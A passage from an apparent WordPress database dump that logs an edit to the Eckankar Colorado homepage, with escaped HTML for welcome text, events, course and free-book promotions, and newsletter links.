class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(241362,41023,'_message_key','post_updated'),(241363,41023,'_user_id','2'),(241364,41023,'_user_login','S8zhaBda'),(241365,41023,'_user_email','nada@zipnadanot.org'),(241366,41023,'_server_remote_addr','76.130.120.x'),(241367,41023,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(241368,41024,'post_id','7160'),(241369,41024,'post_type','page'),(241370,41024,'post_title','Home'),(241371,41024,'post_prev_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600;\" data-font-weight=\"600\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px;\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 600;\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\" data-font-weight=\"600\">(Initiates Subscribe Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(241361,41023,'post_new_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 